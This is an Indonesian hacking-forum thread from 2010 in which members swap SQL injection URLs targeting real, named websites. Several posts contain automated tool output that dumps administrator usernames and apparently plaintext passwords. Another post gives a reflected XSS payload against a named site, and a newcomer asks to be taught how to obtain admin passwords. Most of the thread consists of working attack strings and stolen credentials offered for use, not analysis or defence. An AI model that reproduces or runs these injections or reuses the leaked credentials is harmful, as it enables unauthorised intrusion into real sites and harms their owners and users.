Home

About

Milis

Blog Roll

Group Facebook

XCode Magazine

1,2,3,4,5,6,7,8,9,10,11,12,13,14,15

Selamat Datang Di Komunitas Yogyafree

Selamat datang di komunitas XCode - Yogyafree - Yogya Family Code. Disini kita saling berbagi ilmu komputer, baik hacking, security, programming, software engineering dan lain sebagainya. Klik disini untuk register

Panel
Welcome! Anonymous

bug site post di sini

[ Facebook comments]

Forum untuk membahas semua tentang web hacking mulai dari footprint, scanning, gain access, escalate previlege, exploit,cover track, backdoors sampai mengamankan web

Moderators: Paman, Xshadow, indounderground, NeOS-01

Forum rules
Membahas bugs,penetrasi, eksploitasi dan teknik mengamankan website - websrver. Sertakan POC disini agar member dapat mempelajarinya

Re: bug site post di sini

Postby nesta » Wed Feb 10, 2010 1:16 am

http://www.itmaasia.com/news.php?id=-10+union+select+1,2,concat_ws(0x3a,%20admin_id,username,password),4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,21,22,23,24,25,26,27+from+tb_admin--

:tapa: :tapa: :tapa:
imajinasi jauh lebih penting dari pada pengetahuan
User avatar
nesta
 
Posts: 555
Joined: Fri May 08, 2009 12:17 am

Re: bug site post di sini

Postby adit_coolz » Wed Feb 10, 2010 2:17 am

Code: Select all
[+] URL:http://www.surfingqueensland.com.au/news.php?id=74+AND+1=2+UNION+SELECT+darkc0de,1,2,3--
[+] Evasion Used: "+" "--"
[+] 02:13:43
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
   Database: surf42ql_sq
   User: [email protected]
   Version: 5.0.89-community
[+] Dumping data from database "surf42ql_sq" Table "admin"
[+] Column(s) ['admin_id', 'admin_name', 'admin_pwd', 'admin_email']
[+] Number of Rows: 2

[0] 1:sqwebadmin:check49mate:[email protected]:
[1] 2:schooladmin:gongmi79:[email protected]:[email protected]:


scidies lagi belajar mohon maap kalo banyak salah :kaca:
adit_coolz
 
Posts: 13
Joined: Sun Aug 26, 2007 6:59 pm
Location: pAradIse

Re: bug site post di sini

Postby adit_coolz » Wed Feb 10, 2010 2:38 am

Code: Select all
[+] URL:http://www.duralee.com/trim/sku_treasure.php?Book_id=3+AND+1=2+UNION+SELECT+0,darkc0de,2,3,4,5--
[+] Evasion Used: "+" "--"
[+] 02:37:34
[+] Proxy Not Given
[+] Gathering MySQL Server Configuration...
   Database: duralee_search
   User: [email protected]
   Version: 5.0.82-msl-usrs-sure2-log
[+] Dumping data from database "duralee_search" Table "Administrators"
[+] Column(s) ['user_id', 'username', 'user_password']
[+] Number of Rows: 3

[0] 60:ted:phpwork:
[1] 61:mark:phpwork:
[2] 62:duralee:duralee:duralee:


:devil
adit_coolz
 
Posts: 13
Joined: Sun Aug 26, 2007 6:59 pm
Location: pAradIse

Re: bug site post di sini

Postby turfa » Wed Feb 24, 2010 4:16 am

Plus admin page-nya dong
turfa
 
Posts: 59
Joined: Sun Jan 10, 2010 11:16 am

Re: bug site post di sini

Postby peniru » Fri Feb 26, 2010 4:22 pm

Image
ni ada bug xss.. gk tau mau d apain... bingung... :mati: :mati:

Code: Select all
http://www.ivao.web.id/news.php?id=12&mid=%3Cscript%20language=%22javascript%22%3Ealert(%27halo%27)%3C/script%3E
.::. My Sign .::.
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]
User avatar
peniru
 
Posts: 387
Joined: Fri Jan 25, 2008 9:12 am
Location: makassar

Re: bug site post di sini

Postby dark_superman » Fri Feb 26, 2010 8:29 pm

yang diatas bugsnya yang mana nieh!!!! :circle:

kok halo doang?? masih bingung!!! :putusasa:
User avatar
dark_superman
 
Posts: 13
Joined: Mon Nov 17, 2008 3:44 pm

Re: bug site post di sini

Postby untouch » Fri Feb 26, 2010 9:57 pm

dark_superman wrote:yang diatas bugsnya yang mana nieh!!!! :circle:

kok halo doang?? masih bingung!!! :putusasa:


ha ha hay..
lucu jua postinganya u .. :omg:

metode penyerangan thd web app , gk hanya lwt sql aja omz..
untouch
 
Posts: 19
Joined: Fri Feb 26, 2010 11:36 am

Re: bug site post di sini

Postby peniru » Sat Feb 27, 2010 11:28 pm

dark_superman wrote:yang diatas bugsnya yang mana nieh!!!! :circle:

kok halo doang?? masih bingung!!! :putusasa:

http://www.ivao.web.id/news.php?id=12&mid=%3Cscript%20language=%22javascript%22%3Ealert(%27halo%27)%3C/script%3E

bugnya :
%3Cscript%20language=%22javascript%22%3Ealert(%27halo%27)%3C/script%3E
ato/
<script language="javascript">alert('isi dengan kata yang kamu mau')</script>
-----------------------------------------------------------------------------------------------------
idealnya seharusnya bukan kata 'halo' yang harus muncul. harusnya peringatan ato semacamnyalah... berhubung q masi lum ngerti nginject pake xss, jd q cuman bisa ksi liat tu ajah...
hal itu disebabkan tidak ada proses filter dari masukan variabel yang baik...

kalo gk salah yag,, cus masi cupu :circle: :circle:
.::. My Sign .::.
..noobie Pool..
Pake tools ato tidak bukan masalah yang penting bisa mengerti apa yang dilakukan
[url]karma37.wordpress.com[/url]
[url]koleksiomel.blogspot.co.id[/url]
User avatar
peniru
 
Posts: 387
Joined: Fri Jan 25, 2008 9:12 am
Location: makassar

Re: bug site post di sini

Postby Zinthink » Mon Mar 01, 2010 11:40 am

blackxnovo wrote:
Code: Select all
http://www.ambonekspres.com/index.php?act=rubrik&catid=-9+UNION+ALL+SELECT+1,2,concat_ws(0x3a,User,Password),4,5,6,7,8+from+user--




dah lengkap semua cuma ngga tau halaman admin buat login di mana yaa hehehhe tolonGGGGgg
Zinthink
 
Posts: 6
Joined: Wed Aug 06, 2008 8:40 pm

Re: bug site post di sini

Postby culun2000 » Tue Mar 02, 2010 7:32 am

Permisi om-om yg ganteng, saya mau nanya nih maklum newbie, ini menandakan bug pada suatu website ya? http://www.milim.com/news.php?id=100%27
jika benar, trus ngelanjutin buat dapatin pass adminnya gimana OM
Tolong OM ajarin SQL injection dong OM, Maklum Om anak baru.... :pusing: :pusing: :pusing:
culun2000
 
Posts: 1
Joined: Tue Mar 02, 2010 7:26 am

leave a comment

PreviousNext

Return to Web Hacking

Who is online

Users browsing this forum: No registered users and 12 guests

Web Counter Start : December 14th 2009
Hit Counters

http://www.xcode.or.id